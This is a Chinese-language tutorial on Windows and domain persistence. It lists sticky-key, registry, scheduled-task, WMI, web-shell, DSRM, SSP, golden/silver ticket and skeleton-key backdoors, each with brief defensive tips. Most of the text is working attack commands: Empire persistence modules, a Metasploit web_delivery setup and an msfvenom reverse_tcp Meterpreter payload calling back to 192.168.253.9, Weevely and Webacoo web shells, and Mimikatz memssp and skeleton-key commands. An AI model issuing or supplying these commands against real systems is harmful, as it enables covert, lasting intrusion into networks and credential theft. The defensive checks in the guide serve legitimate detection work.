权限维持技术全面指南

前言

权限维持是攻击者在获取系统控制权后保持持久访问的关键技术。本指南详细介绍了Windows系统中常见的权限维持方法及相应的防御措施。

一、操作系统后门技术

1. 粘滞键后门

技术原理：

• 替换系统目录下的sethc.exe（粘滞键程序）为cmd.exe
• 连续按5次Shift键可触发系统权限的命令行窗口

Empire实现：

usemodule lateral_movement/invoke_wmi_debuggerinfo
set Listener dayu
set ComputerName user1.xiyou.dayu.com
set TargetBinary sethc.exe
execute

防御措施：

1. 远程登录时测试Shift键功能
2. 禁用粘滞键功能（控制面板→轻松访问中心）

2. 注册表后门

技术原理：

• 修改注册表启动项：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
• 用户登录时自动执行恶意程序

Empire实现：

usemodule persistence/userland/registry
set Listener dayu
set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run
execute

防御措施：

1. 使用杀毒软件监控注册表启动项
2. 定期检查可疑注册表项

3. 计划任务后门

技术实现：

schtasks /Create /tn Updater /tr notepad.exe /sc MINUTE /mo 1

MSF实现：

use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.253.9
set lport 443
set URIPATH /exploit

Empire实现：

usemodule persistence/elevated/schtasks
set DailyTime 15:36
set Listener dayu
execute

防御措施：

1. 安装安全防护软件
2. 使用强密码策略
3. 监控计划任务创建行为

4. MSF后门

生成与使用：

# 生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.253.9 LPORT=4444 -f exe > 1.exe

# 创建持久化服务
run persistence -S -U -X -i 5 -p 443 -r IP

二、WMI后门

Empire实现：

usemodule persistence/elevated/wmi
set DailyTime 16:10
set Listener dayu
run

检测方法：

Get-WmiObject -Namespace root\Subscription -Class CommandLineEventConsumer -FILTER "Name='Updater'"

三、Web后门技术

1. Weevely后门

使用方法：

# 生成后门
weevely generate <password> <path>

# 连接后门
weevely <url> <password> [cmd]

2. Webacoo后门

使用方法：

# 生成后门
webacoo -g -o 123.php

# 连接后门
webacoo -t -u http://192.168.x.x/123.php

四、域控制器权限持久化技术

1. DSRM域后门

技术原理：

• 利用目录服务恢复模式(DSRM)的本地管理员账户
• 修改DSRM密码或同步域账号密码

实现方法：

1. 使用ntdsutil修改DSRM密码：

NTDSUTIL
set dsrm password
reset password on server null
<PASSWORD>
q
q

2. 使用krbtgt的NTLM hash覆盖：

ntdsutil
set dsrm password sync from domain account krbtgt
q
q

3. 启用DSRM网络登录：

New-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD

防御措施：

1. 监控注册表键值：hklm:\system\currentcontrolset\control\lsa\
2. 定期修改DSRM账号密码
3. 检查4794事件日志

2. SSP维持技术

Mimikatz内存注入：

privilege::debug
misc::memssp

DLL注入：

1. 复制mimilib.dll到System32目录
2. 修改注册表：

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

防御措施：

1. 检查注册表Security Packages项
2. 监控System32目录下的可疑DLL
3. 使用工具检查LSA中的DLL

3. SID History后门

黄金票据：

• 需要：域名、域SID、krbtgt的NTLM hash
• 特点：不与AS交互，持久性强

白银票据：

• 需要：服务账户的NTLM hash
• 特点：不与KDC交互，针对特定服务

防御措施：

1. 监控SID为500的用户
2. 检查4765和4766事件日志
3. 清除不必要的SID History属性

4. Skeleton Key（万能密码）

实现方法：

privilege::debug
misc::skeleton

Empire实现：

usemodule persistence/misc/skeleton_key
execute

防御措施：

1. 启用LSA保护策略
2. 实施双因子认证
3. 使用应用程序白名单
4. 域管理员使用强密码

总结

权限维持技术是攻防对抗中的关键环节，防守方需要：

1. 了解各种后门技术原理
2. 建立全面的监控体系
3. 实施严格的权限管理
4. 定期进行安全检查

攻击者通常会组合使用多种技术实现持久化访问，因此防御也需要多层次、全方位的防护策略。